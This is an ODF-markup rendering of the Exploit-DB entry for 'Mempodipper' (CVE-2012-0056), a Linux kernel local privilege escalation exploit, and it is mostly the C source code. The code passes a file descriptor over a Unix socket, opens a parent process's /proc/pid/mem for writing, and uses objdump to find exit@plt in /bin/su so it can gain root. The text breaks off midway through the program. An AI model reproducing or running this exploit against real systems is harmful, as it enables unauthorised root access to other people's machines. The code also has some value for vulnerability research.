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exploits:mempodipper"/><text:bookmark-start text:name="__RefHeading___mempodipper_1"/><text:bookmark-start text:name="mempodipper"/>mempodipper<text:bookmark-end text:name="__RefHeading___mempodipper_1"/><text:bookmark-end text:name="mempodipper"/></text:h>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Strong_20_Emphasis">CVE-2012-0056</text:span>
Linux Kernel 2.6.39 &lt; 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege Escalation (1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Exploit code is here: http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c<text:line-break/>Blog post about it is here: http://blog.zx2c4.com/749<text:line-break/>EDB-Note: Updated version can be found here: https://www.exploit-db.com/exploits/35161/<text:line-break/> <text:line-break/># Exploit Title: Mempodipper - Linux Local Root for &gt;=2.6.39, 32-bit and 64-bit<text:line-break/># Date: Jan 21, 2012<text:line-break/># Author: zx2c4<text:line-break/># Tested on: Gentoo, Ubuntu<text:line-break/># Platform: Linux<text:line-break/># Category: Local<text:line-break/># CVE-2012-0056<text:line-break/> <text:line-break/> <text:line-break/> * Mempodipper<text:line-break/> * by zx2c4<text:line-break/> * <text:line-break/> * Linux Local Root Exploit<text:line-break/> * <text:line-break/> * Rather than put my write up here, per usual, this time I've put it<text:line-break/> * in a rather lengthy blog post: http://blog.zx2c4.com/749<text:line-break/> * <text:line-break/> * Enjoy.<text:line-break/> * <text:line-break/> * - zx2c4<text:line-break/> * Jan 21, 2012<text:line-break/> * <text:line-break/> * CVE-2012-0056<text:line-break/> */</text:span><text:line-break/> <text:line-break/><text:span text:style-name="highlight_co2">#define _LARGEFILE64_SOURCE </text:span><text:line-break/><text:span text:style-name="highlight_co2">#include &lt;stdio.h&gt;</text:span><text:line-break/><text:span text:style-name="highlight_co2">#include &lt;string.h&gt;</text:span><text:line-break/><text:span text:style-name="highlight_co2">#include &lt;stdlib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ys/socket.h&gt;</text:span><text:line-break/><text:span text:style-name="highlight_co2">#include &lt;sys/un.h&gt;</text:span><text:line-break/><text:span text:style-name="highlight_co2">#include &lt;fcntl.h&gt;</text:span><text:line-break/><text:span text:style-name="highlight_co2">#include &lt;unistd.h&gt;</text:span><text:line-break/><text:span text:style-name="highlight_co2">#include &lt;limits.h&gt;</text:span><text:line-break/> <text:line-break/><text:span text:style-name="highlight_kw4">char</text:span> <text:span text:style-name="highlight_sy0">*</text:span>socket_path <text:span text:style-name="highlight_sy0">=</text:span> <text:span text:style-name="highlight_st0">"/tmp/.sockpuppet"</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:span text:style-name="highlight_kw4">int</text:span> send_fd<text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_kw4">int</text:span> fd<text:span text:style-name="highlight_br0">)</text:span><text:line-break/><text:span text:style-name="highlight_br0">{</text:span><text:line-break/><text:tab/><text:span text:style-name="highlight_kw4">char</text:span> buf<text:span text:style-name="highlight_br0">[</text:span><text:span text:style-name="highlight_nu0">1</text:span><text:span text:style-name="highlight_br0">]</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:span text:style-name="highlight_kw4">struct</text:span> iovec iov<text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:span text:style-name="highlight_kw4">struct</text:span> msghdr msg<text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:span text:style-name="highlight_kw4">struct</text:span> cmsghdr <text:span text:style-name="highlight_sy0">*</text:span>cmsg<text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:span text:style-name="highlight_kw4">struct</text:span> sockaddr_un addr<text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:span text:style-name="highlight_kw4">int</text:span> n<text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:span text:style-name="highlight_kw4">int</text:span> sock<text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:span text:style-name="highlight_kw4">char</text:span> cms<text:span text:style-name="highlight_br0">[</text:span>CMSG_SPACE<text:span text:style-name="highlight_br0">(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br0">]</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/> <text:line-break/><text:tab/><text:span text:style-name="highlight_kw1">if</text:span> <text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_br0">(</text:span>sock <text:span text:style-name="highlight_sy0">=</text:span> socket<text:span text:style-name="highlight_br0">(</text:span>AF_UNIX<text:span text:style-name="highlight_sy0">,</text:span> SOCK_STREAM<text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_nu0">0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<text:span text:style-name="highlight_sy0">&amp;</text:span>addr<text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_nu0">0</text:span><text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_kw4">sizeof</text:span><text:span text:style-name="highlight_br0">(</text:span>addr<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/>addr.<text:span text:style-name="highlight_me1">sun_family</text:span> <text:span text:style-name="highlight_sy0">=</text:span> AF_UNIX<text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab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addr.<text:span text:style-name="highlight_me1">sun_path</text:span><text:span text:style-name="highlight_sy0">,</text:span> socket_path<text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_kw4">sizeof</text:span><text:span text:style-name="highlight_br0">(</text:span>addr.<text:span text:style-name="highlight_me1">sun_path</text:span><text:span text:style-name="highlight_br0">)</text:span> <text:span text:style-name="highlight_sy0">-</text:span> <text:span text:style-name="highlight_nu0">1</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab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<text:span text:style-name="highlight_sy0">*</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">&amp;</text:span>addr<text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_kw4">sizeof</text:span><text:span text:style-name="highlight_br0">(</text:span>addr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 <text:line-break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tab/>iov.<text:span text:style-name="highlight_me1">iov_base</text:span> <text:span text:style-name="highlight_sy0">=</text:span> buf<text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/>iov.<text:span text:style-name="highlight_me1">iov_len</text:span> <text:span text:style-name="highlight_sy0">=</text:span> <text:span text:style-name="highlight_nu0">1</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/> <text:line-break/><text:tab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<text:span text:style-name="highlight_sy0">&amp;</text:span>msg<text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_nu0">0</text:span><text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_kw4">sizeof</text:span> msg<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/>msg.<text:span text:style-name="highlight_me1">msg_iov</text:span> <text:span text:style-name="highlight_sy0">=</text:span> <text:span text:style-name="highlight_sy0">&amp;</text:span>iov<text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/>msg.<text:span text:style-name="highlight_me1">msg_iovlen</text:span> <text:span text:style-name="highlight_sy0">=</text:span> <text:span text:style-name="highlight_nu0">1</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/>msg.<text:span text:style-name="highlight_me1">msg_control</text:span> <text:span text:style-name="highlight_sy0">=</text:span> <text:span text:style-name="highlight_br0">(</text:span>caddr_t<text:span text:style-name="highlight_br0">)</text:span>cms<text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/>msg.<text:span text:style-name="highlight_me1">msg_controllen</text:span> <text:span text:style-name="highlight_sy0">=</text:span> CMSG_LEN<text:span text:style-name="highlight_br0">(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 <text:line-break/><text:tab/>cmsg <text:span text:style-name="highlight_sy0">=</text:span> CMSG_FIRSTHDR<text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_sy0">&amp;</text:span>msg<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/>cmsg<text:span text:style-name="highlight_sy0">-&gt;</text:span>cmsg_len <text:span text:style-name="highlight_sy0">=</text:span> CMSG_LEN<text:span text:style-name="highlight_br0">(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tab/>cmsg<text:span text:style-name="highlight_sy0">-&gt;</text:span>cmsg_level <text:span text:style-name="highlight_sy0">=</text:span> SOL_SOCKET<text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/>cmsg<text:span text:style-name="highlight_sy0">-&gt;</text:span>cmsg_type <text:span text:style-name="highlight_sy0">=</text:span> SCM_RIGHTS<text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:a xlink:type="simple" xlink:href="http://www.opengroup.org/onlinepubs/009695399/functions/memmove.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><text:span text:style-name="highlight_kw3">memmove</text:span></text:a><text:span text:style-name="highlight_br0">(</text:span>CMSG_DATA<text:span text:style-name="highlight_br0">(</text:span>cmsg<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_sy0">&amp;</text:span>fd<text:span text:style-name="highlight_sy0">,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 <text:line-break/><text:tab/><text:span text:style-name="highlight_kw1">if</text:span> <text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_br0">(</text:span>n <text:span text:style-name="highlight_sy0">=</text:span> sendmsg<text:span text:style-name="highlight_br0">(</text:span>sock<text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_sy0">&amp;</text:span>msg<text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_nu0">0</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_br0">)</text:span> <text:span text:style-name="highlight_sy0">!=</text:span> iov.<text:span text:style-name="highlight_me1">iov_len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close<text:span text:style-name="highlight_br0">(</text:span>sock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int</text:span> recv_fd<text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_br0">)</text:span><text:line-break/><text:span text:style-name="highlight_br0">{</text:span><text:line-break/><text:tab/><text:span text:style-name="highlight_kw4">int</text:span> listener<text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:span text:style-name="highlight_kw4">int</text:span> sock<text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:span text:style-name="highlight_kw4">int</text:span> n<text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:span text:style-name="highlight_kw4">int</text:span> fd<text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:span text:style-name="highlight_kw4">char</text:span> buf<text:span text:style-name="highlight_br0">[</text:span><text:span text:style-name="highlight_nu0">1</text:span><text:span text:style-name="highlight_br0">]</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:span text:style-name="highlight_kw4">struct</text:span> iovec iov<text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:span text:style-name="highlight_kw4">struct</text:span> msghdr msg<text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:span text:style-name="highlight_kw4">struct</text:span> cmsghdr <text:span text:style-name="highlight_sy0">*</text:span>cmsg<text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:span text:style-name="highlight_kw4">struct</text:span> sockaddr_un addr<text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:span text:style-name="highlight_kw4">char</text:span> cms<text:span text:style-name="highlight_br0">[</text:span>CMSG_SPACE<text:span text:style-name="highlight_br0">(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br0">]</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/> <text:line-break/><text:tab/><text:span text:style-name="highlight_kw1">if</text:span> <text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_br0">(</text:span>listener <text:span text:style-name="highlight_sy0">=</text:span> socket<text:span text:style-name="highlight_br0">(</text:span>AF_UNIX<text:span text:style-name="highlight_sy0">,</text:span> SOCK_STREAM<text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_nu0">0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<text:span text:style-name="highlight_sy0">&amp;</text:span>addr<text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_nu0">0</text:span><text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_kw4">sizeof</text:span><text:span text:style-name="highlight_br0">(</text:span>addr<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/>addr.<text:span text:style-name="highlight_me1">sun_family</text:span> <text:span text:style-name="highlight_sy0">=</text:span> AF_UNIX<text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab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addr.<text:span text:style-name="highlight_me1">sun_path</text:span><text:span text:style-name="highlight_sy0">,</text:span> socket_path<text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_kw4">sizeof</text:span><text:span text:style-name="highlight_br0">(</text:span>addr.<text:span text:style-name="highlight_me1">sun_path</text:span><text:span text:style-name="highlight_br0">)</text:span> <text:span text:style-name="highlight_sy0">-</text:span> <text:span text:style-name="highlight_nu0">1</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/>unlink<text:span text:style-name="highlight_br0">(</text:span>socket_path<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:span text:style-name="highlight_kw1">if</text:span> <text:span text:style-name="highlight_br0">(</text:span>bind<text:span text:style-name="highlight_br0">(</text:span>listener<text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_kw4">struct</text:span> sockaddr<text:span text:style-name="highlight_sy0">*</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">&amp;</text:span>addr<text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_kw4">sizeof</text:span><text:span text:style-name="highlight_br0">(</text:span>addr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span text:style-name="highlight_kw1">if</text:span> <text:span text:style-name="highlight_br0">(</text:span>listen<text:span text:style-name="highlight_br0">(</text:span>listener<text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_nu0">1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span text:style-name="highlight_kw1">if</text:span> <text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_br0">(</text:span>sock <text:span text:style-name="highlight_sy0">=</text:span> accept<text:span text:style-name="highlight_br0">(</text:span>listener<text:span text:style-name="highlight_sy0">,</text:span> NULL<text:span text:style-name="highlight_sy0">,</text:span> NULL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 <text:line-break/><text:tab/>iov.<text:span text:style-name="highlight_me1">iov_base</text:span> <text:span text:style-name="highlight_sy0">=</text:span> buf<text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/>iov.<text:span text:style-name="highlight_me1">iov_len</text:span> <text:span text:style-name="highlight_sy0">=</text:span> <text:span text:style-name="highlight_nu0">1</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/> <text:line-break/><text:tab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<text:span text:style-name="highlight_sy0">&amp;</text:span>msg<text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_nu0">0</text:span><text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_kw4">sizeof</text:span> msg<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/>msg.<text:span text:style-name="highlight_me1">msg_name</text:span> <text:span text:style-name="highlight_sy0">=</text:span> <text:span text:style-name="highlight_nu0">0</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/>msg.<text:span text:style-name="highlight_me1">msg_namelen</text:span> <text:span text:style-name="highlight_sy0">=</text:span> <text:span text:style-name="highlight_nu0">0</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/>msg.<text:span text:style-name="highlight_me1">msg_iov</text:span> <text:span text:style-name="highlight_sy0">=</text:span> <text:span text:style-name="highlight_sy0">&amp;</text:span>iov<text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/>msg.<text:span text:style-name="highlight_me1">msg_iovlen</text:span> <text:span text:style-name="highlight_sy0">=</text:span> <text:span text:style-name="highlight_nu0">1</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/> <text:line-break/><text:tab/>msg.<text:span text:style-name="highlight_me1">msg_control</text:span> <text:span text:style-name="highlight_sy0">=</text:span> <text:span text:style-name="highlight_br0">(</text:span>caddr_t<text:span text:style-name="highlight_br0">)</text:span>cms<text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/>msg.<text:span text:style-name="highlight_me1">msg_controllen</text:span> <text:span text:style-name="highlight_sy0">=</text:span> <text:span text:style-name="highlight_kw4">sizeof</text:span> cms<text:span text:style-name="highlight_sy0">;</text:span><text:line-break/> <text:line-break/><text:tab/><text:span text:style-name="highlight_kw1">if</text:span> <text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_br0">(</text:span>n <text:span text:style-name="highlight_sy0">=</text:span> recvmsg<text:span text:style-name="highlight_br0">(</text:span>sock<text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_sy0">&amp;</text:span>msg<text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_nu0">0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span text:style-name="highlight_kw1">if</text:span> <text:span text:style-name="highlight_br0">(</text:span>n <text:span text:style-name="highlight_sy0">==</text:span> <text:span text:style-name="highlight_nu0">0</text:span><text:span text:style-name="highlight_br0">)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cmsg <text:span text:style-name="highlight_sy0">=</text:span> CMSG_FIRSTHDR<text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_sy0">&amp;</text:span>msg<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:a xlink:type="simple" xlink:href="http://www.opengroup.org/onlinepubs/009695399/functions/memmove.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><text:span text:style-name="highlight_kw3">memmove</text:span></text:a><text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_sy0">&amp;</text:span>fd<text:span text:style-name="highlight_sy0">,</text:span> CMSG_DATA<text:span text:style-name="highlight_br0">(</text:span>cmsg<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">,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tab/>close<text:span text:style-name="highlight_br0">(</text:span>sock<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/>close<text:span text:style-name="highlight_br0">(</text:span>listener<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:span text:style-name="highlight_kw1">return</text:span> fd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tab/><text:span text:style-name="highlight_kw1">if</text:span> <text:span text:style-name="highlight_br0">(</text:span>argc <text:span text:style-name="highlight_sy0">&gt;</text:span> <text:span text:style-name="highlight_nu0">2</text:span> <text:span text:style-name="highlight_sy0">&amp;&amp;</text:span> argv<text:span text:style-name="highlight_br0">[</text:span><text:span text:style-name="highlight_nu0">1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==</text:span> <text:span text:style-name="highlight_st0">'-'</text:span> <text:span text:style-name="highlight_sy0">&amp;&amp;</text:span> argv<text:span text:style-name="highlight_br0">[</text:span><text:span text:style-name="highlight_nu0">1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==</text:span> <text:span text:style-name="highlight_st0">'c'</text:span><text:span text:style-name="highlight_br0">)</text:span> <text:span text:style-name="highlight_br0">{</text:span><text:line-break/><text:tab/><text:tab/><text:span text:style-name="highlight_kw4">char</text:span> parent_mem<text:span text:style-name="highlight_br0">[</text:span><text:span text:style-name="highlight_nu0">256</text:span><text:span text:style-name="highlight_br0">]</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:tab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parent_mem<text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_st0">"/proc/%s/mem"</text:span><text:span text:style-name="highlight_sy0">,</text:span> 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Opening parent mem %s in child.<text:span text:style-name="highlight_es1">\n</text:span>"</text:span><text:span text:style-name="highlight_sy0">,</text:span> parent_mem<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:tab/><text:span text:style-name="highlight_kw4">int</text:span> fd <text:span text:style-name="highlight_sy0">=</text:span> open<text:span text:style-name="highlight_br0">(</text:span>parent_mem<text:span text:style-name="highlight_sy0">,</text:span> O_RDWR<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:tab/><text:span text:style-name="highlight_kw1">if</text:span> <text:span text:style-name="highlight_br0">(</text:span>fd <text:span text:style-name="highlight_sy0">&lt;</text:span> <text:span text:style-name="highlight_nu0">0</text:span><text:span text:style-name="highlight_br0">)</text:span> <text:span text:style-name="highlight_br0">{</text:span><text:line-break/><text:tab/><text:tab/><text:tab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[-] open"</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:tab/><text:tab/><text:span text:style-name="highlight_kw1">return</text:span> <text:span text:style-name="highlight_nu0">1</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:tab/><text:span text:style-name="highlight_br0">}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Sending fd %d to parent.<text:span text:style-name="highlight_es1">\n</text:span>"</text:span><text:span text:style-name="highlight_sy0">,</text:span> fd<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:tab/>send_fd<text:span text:style-name="highlight_br0">(</text:span>fd<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;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===============================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=<text:s text:c="10"/>Mempodipper<text:s text:c="8"/>=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=<text:s text:c="11"/>by zx2c4<text:s text:c="10"/>=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=<text:s text:c="9"/>Jan 21, 2012<text:s text:c="8"/>=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===============================<text:span text:style-name="highlight_es1">\n</text:span><text:span text:style-name="highlight_es1">\n</text:span>"</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/> <text:line-break/><text:tab/><text:span text:style-name="highlight_kw4">int</text:span> parent_pid <text:span text:style-name="highlight_sy0">=</text:span> getpid<text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:span text:style-name="highlight_kw1">if</text:span> <text:span text:style-name="highlight_br0">(</text:span>fork<text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_br0">)</text:span>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Waiting for transferred fd in parent.<text:span text:style-name="highlight_es1">\n</text:span>"</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:tab/><text:span text:style-name="highlight_kw4">int</text:span> fd <text:span text:style-name="highlight_sy0">=</text:span> recv_fd<text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;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Received fd at %d.<text:span text:style-name="highlight_es1">\n</text:span>"</text:span><text:span text:style-name="highlight_sy0">,</text:span> fd<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:tab/><text:span text:style-name="highlight_kw1">if</text:span> <text:span text:style-name="highlight_br0">(</text:span>fd <text:span text:style-name="highlight_sy0">&lt;</text:span> <text:span text:style-name="highlight_nu0">0</text:span><text:span text:style-name="highlight_br0">)</text:span> <text:span text:style-name="highlight_br0">{</text:span><text:line-break/><text:tab/><text:tab/><text:tab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[-] recv_fd"</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab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tab/><text:span text:style-name="highlight_br0">}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Assigning fd %d to stderr.<text:span text:style-name="highlight_es1">\n</text:span>"</text:span><text:span text:style-name="highlight_sy0">,</text:span> fd<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:tab/>dup2<text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_nu0">2</text:span><text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_nu0">6</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:tab/>dup2<text:span text:style-name="highlight_br0">(</text:span>fd<text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_nu0">2</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/> <text:line-break/><text:tab/><text:tab/><text:span text:style-name="highlight_kw4">unsigned</text:span> <text:span text:style-name="highlight_kw4">long</text:span> address<text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:tab/><text:span text:style-name="highlight_kw1">if</text:span> <text:span text:style-name="highlight_br0">(</text:span>argc <text:span text:style-name="highlight_sy0">&gt;</text:span> <text:span text:style-name="highlight_nu0">2</text:span> <text:span text:style-name="highlight_sy0">&amp;&amp;</text:span> argv<text:span text:style-name="highlight_br0">[</text:span><text:span text:style-name="highlight_nu0">1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==</text:span> <text:span text:style-name="highlight_st0">'-'</text:span> <text:span text:style-name="highlight_sy0">&amp;&amp;</text:span> argv<text:span text:style-name="highlight_br0">[</text:span><text:span text:style-name="highlight_nu0">1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==</text:span> <text:span text:style-name="highlight_st0">'o'</text:span><text:span text:style-name="highlight_br0">)</text:span><text:line-break/><text:tab/><text:tab/><text:tab/>address <text:span text:style-name="highlight_sy0">=</text:span> <text:a xlink:type="simple" xlink:href="http://www.opengroup.org/onlinepubs/009695399/functions/strtoul.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><text:span text:style-name="highlight_kw3">strtou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sy0">,</text:span> NULL<text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_nu0">16</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:tab/><text:span text:style-name="highlight_kw1">else</text:span> <text:span text:style-name="highlight_br0">{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Reading su for exit@plt.<text:span text:style-name="highlight_es1">\n</text:span>"</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:tab/><text:tab/><text:span text:style-name="highlight_co1">// Poor man's auto-detection. Do this in memory instead of relying on objdump being installed.</text:span><text:line-break/><text:tab/><text:tab/><text:tab/>FILE <text:span text:style-name="highlight_sy0">*</text:span>command <text:span text:style-name="highlight_sy0">=</text:span> popen<text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_st0">"objdump -d /bin/su|grep 'exit@plt'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*<text:span text:style-name="highlight_es1">\\</text:span>([^0]*<text:span text:style-name="highlight_es1">\\</text:span>)/0x<text:span text:style-name="highlight_es1">\\</text:span>1/'"</text:span><text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_st0">"r"</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:tab/><text:tab/><text:span text:style-name="highlight_kw4">char</text:span> result<text:span text:style-name="highlight_br0">[</text:span><text:span text:style-name="highlight_nu0">32</text:span><text:span text:style-name="highlight_br0">]</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:tab/><text:tab/>result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tab/><text:tab/><text:tab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result<text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_nu0">32</text:span><text:span text:style-name="highlight_sy0">,</text:span> command<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:tab/><text:tab/>pclose<text:span text:style-name="highlight_br0">(</text:span>command<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:tab/><text:tab/>address <text:span text:style-name="highlight_sy0">=</text:span> <text:a xlink:type="simple" xlink:href="http://www.opengroup.org/onlinepubs/009695399/functions/strtoul.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><text:span text:style-name="highlight_kw3">strtoul</text:span></text:a><text:span text:style-name="highlight_br0">(</text:span>result<text:span text:style-name="highlight_sy0">,</text:span> NULL<text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_nu0">16</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:tab/><text:tab/><text:span text:style-name="highlight_kw1">if</text:span> <text:span text:style-name="highlight_br0">(</text:span>address <text:span text:style-name="highlight_sy0">==</text:span> ULONG_MAX <text:span text:style-name="highlight_sy0">||</text:span> <text:span text:style-name="highlight_sy0">!</text:span>address<text:span text:style-name="highlight_br0">)</text:span> <text:span text:style-name="highlight_br0">{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-] Could not resolve /bin/su. Specify the exit@plt function address manually.<text:span text:style-name="highlight_es1">\n</text:span>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-] Usage: %s -o ADDRESS<text:span text:style-name="highlight_es1">\n</text:span>[-] Example: %s -o 0x402178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tab/><text:tab/><text:tab/><text:tab/><text:span text:style-name="highlight_kw1">return</text:span> <text:span text:style-name="highlight_nu0">1</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:tab/><text:tab/><text:span text:style-name="highlight_br0">}</text:span><text:line-break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Resolved exit@plt to 0x%lx.<text:span 